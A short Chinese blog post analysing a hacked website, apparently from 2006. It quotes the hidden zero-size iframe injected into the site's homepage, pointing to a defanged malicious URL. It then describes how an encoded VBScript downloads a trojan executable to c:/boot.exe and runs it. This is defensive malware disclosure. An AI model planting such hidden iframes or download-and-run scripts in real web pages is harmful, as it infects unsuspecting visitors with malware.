一个被加入下载木马Trojan-Downloader.Win32.Delf.ajm的网站

本文分析了一种通过网页iframe标签植入恶意代码的技术手段。该恶意代码使用了加密的VBscript脚本,利用Microsoft.XMLHTTP和FileSystemObject下载并执行了一个名为z*l.exe的木马程序,该木马被安全软件识别为Trojan-Downloader.Win32.Delf.ajm或Trojan.DL.Multi.wen。

endurer 原创

2006-12-06 第1

该网站首页末被<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加入</a></nobr>代码:

/--------
<iframe src=hxxp://www.z*z***yqr.com/z*l/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm 的内容为escape()<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>加密</a></nobr>的VBscrīpt<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>脚本</a></nobr>代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 z*l.exe,保存为 c:/boot.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。

z*l.exe Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm,<nobr><a class="iAs" style="CURSOR: hand; COLOR: #0000ff; BACKGROUND-COLOR: transparent; TEXT-DECORATION: underline" target="_blank" false>瑞星</a></nobr>报为Trojan.DL.Multi.wen

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值